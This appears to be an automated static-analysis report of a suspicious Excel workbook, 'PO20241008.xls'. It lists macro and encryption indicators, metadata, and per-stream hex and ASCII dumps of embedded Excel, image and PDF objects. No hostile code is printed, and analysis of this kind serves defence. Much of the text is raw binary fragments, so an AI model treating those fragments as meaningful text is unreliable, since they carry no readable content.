              General

              Document Type:OLE
              Number of OLE Files:1

              OLE File "PO20241008.xls"

              Indicators
              Has Summary Info:
              Application Name:Microsoft Excel
              Encrypted Document:True
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:True
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:False
              Flash Objects Count:0
              Contains VBA Macros:True
              Summary
              Code Page:1252
              Author:
              Last Saved By:
              Create Time:2006-09-16 00:00:00
              Last Saved Time:2024-10-08 05:29:01
              Creating Application:Microsoft Excel
              Security:1
              Document Summary
              Document Code Page:1252
              Thumbnail Scaling Desired:False
              Contains Dirty Links:False
              Shared Document:False
              Changed Hyperlinks:False
              Application Version:786432

              Streams with VBA

              VBA File Name: Sheet1.cls, Stream Size: 977
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
              VBA File Name:Sheet1.cls
              Stream Size:977
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n Y 1 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e7 6e 59 31 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              VBA Code
              Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

              VBA File Name: Sheet2.cls, Stream Size: 977
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
              VBA File Name:Sheet2.cls
              Stream Size:977
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e7 6e eb f4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              VBA Code
              Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

              VBA File Name: Sheet3.cls, Stream Size: 977
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
              VBA File Name:Sheet3.cls
              Stream Size:977
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e7 6e ae 0b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              VBA Code
              Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

              VBA File Name: ThisWorkbook.cls, Stream Size: 985
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
              VBA File Name:ThisWorkbook.cls
              Stream Size:985
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n H j . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e7 6e 48 6a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              VBA Code
              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

              Streams

              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
              General
              Stream Path:\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.25248375192737
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
              General
              Stream Path:\x5DocumentSummaryInformation
              CLSID:
              File Type:data
              Stream Size:244
              Entropy:2.889430592781307
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
              General
              Stream Path:\x5SummaryInformation
              CLSID:
              File Type:data
              Stream Size:200
              Entropy:3.2820681057018666
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . + B . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
              Stream Path: MBD0015E099/\x1CompObj, File Type: data, Stream Size: 114
              General
              Stream Path:MBD0015E099/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.25248375192737
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
              General
              Stream Path:MBD0015E099/\x5DocumentSummaryInformation
              CLSID:
              File Type:data
              Stream Size:244
              Entropy:2.701136490257069
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
              Stream Path: MBD0015E099/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 90976
              General
              Stream Path:MBD0015E099/\x5SummaryInformation
              CLSID:
              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
              Stream Size:90976
              Entropy:1.885975041684416
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
              Stream Path: MBD0015E099/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
              General
              Stream Path:MBD0015E099/MBD0018D4CE/\x1Ole
              CLSID:
              File Type:data
              Stream Size:20
              Entropy:0.5689955935892812
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . .
              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
              General
              Stream Path:MBD0015E099/MBD0018D4CE/\x3ObjInfo
              CLSID:
              File Type:data
              Stream Size:4
              Entropy:0.8112781244591328
              Base64 Encoded:False
              Data ASCII:. . . .
              Data Raw:00 00 03 00
              Stream Path: MBD0015E099/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
              General
              Stream Path:MBD0015E099/MBD0018D4CE/Contents
              CLSID:
              File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
              Stream Size:197671
              Entropy:6.989042939766534
              Base64 Encoded:True
              Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/MBD002A52B4/\x1CompObj, File Type: data, Stream Size: 114
              General
              Stream Path:MBD0015E099/MBD002A52B4/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.219515110876372
              Base64 Encoded:False
              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/MBD002A52B4/Package, File Type: Microsoft Excel 2007+, Stream Size: 50945
              General
              Stream Path:MBD0015E099/MBD002A52B4/Package
              CLSID:
              File Type:Microsoft Excel 2007+
              Stream Size:50945
              Entropy:7.631071730257267
              Base64 Encoded:True
              Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/MBD002A56E1/\x1CompObj, File Type: data, Stream Size: 114
              General
              Stream Path:MBD0015E099/MBD002A56E1/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.219515110876372
              Base64 Encoded:False
              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/MBD002A56E1/Package, File Type: Microsoft Excel 2007+, Stream Size: 31124
              General
              Stream Path:MBD0015E099/MBD002A56E1/Package
              CLSID:
              File Type:Microsoft Excel 2007+
              Stream Size:31124
              Entropy:7.746149934092623
              Base64 Encoded:True
              Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/MBD002A5E23/\x1CompObj, File Type: data, Stream Size: 114
              General
              Stream Path:MBD0015E099/MBD002A5E23/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:114
              Entropy:4.25248375192737
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/MBD002A5E23/\x5DocumentSummaryInformation, File Type: data, Stream Size: 484
              General
              Stream Path:MBD0015E099/MBD002A5E23/\x5DocumentSummaryInformation
              CLSID:
              File Type:data
              Stream Size:484
              Entropy:3.922883556049869
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
              Stream Path: MBD0015E099/MBD002A5E23/\x5SummaryInformation, File Type: data, Stream Size: 19956
              General
              Stream Path:MBD0015E099/MBD002A5E23/\x5SummaryInformation
              CLSID:
              File Type:data
              Stream Size:19956
              Entropy:3.056974324659501
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . _ . . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
              Stream Path: MBD0015E099/MBD002A5E23/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 95624
              General
              Stream Path:MBD0015E099/MBD002A5E23/Workbook
              CLSID:
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:95624
              Entropy:3.889652332882722
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
              Stream Path: MBD0015E099/MBD002A6130/\x1CompObj, File Type: data, Stream Size: 94
              General
              Stream Path:MBD0015E099/MBD002A6130/\x1CompObj
              CLSID:
              File Type:data
              Stream Size:94
              Entropy:4.345966460061678
              Base64 Encoded:False
              Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: MBD0015E099/MBD002A6130/\x1Ole, File Type: data, Stream Size: 64
              General
              Stream Path:MBD0015E099/MBD002A6130/\x1Ole
              CLSID:
              File Type:data
              Stream Size:64
              Entropy:2.935667186688699
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . F e u i l 1 ! O b j e c t 1 8 4 .
              Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 46 65 75 69 6c 31 21 4f 62 6a 65 63 74 20 31 38 34 00
              Stream Path: MBD0015E099/MBD002A6130/CONTENTS, File Type: PDF document, version 1.7, Stream Size: 21760
              General
              Stream Path:MBD0015E099/MBD002A6130/CONTENTS
              CLSID:
              File Type:PDF document, version 1.7
              Stream Size:21760
              Entropy:7.954015192696893
              Base64 Encoded:True
              Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 2 4 0 R . > > . e n d o b j . 8 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 9 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 1 0 0 o b j . < < . / L e n g t h 3 8 . / F i l t e r / F l a t e D e c o d e . > > . s t r e a m . . x + 2 7 2 3 7 U 0 . B . . s = # . 3
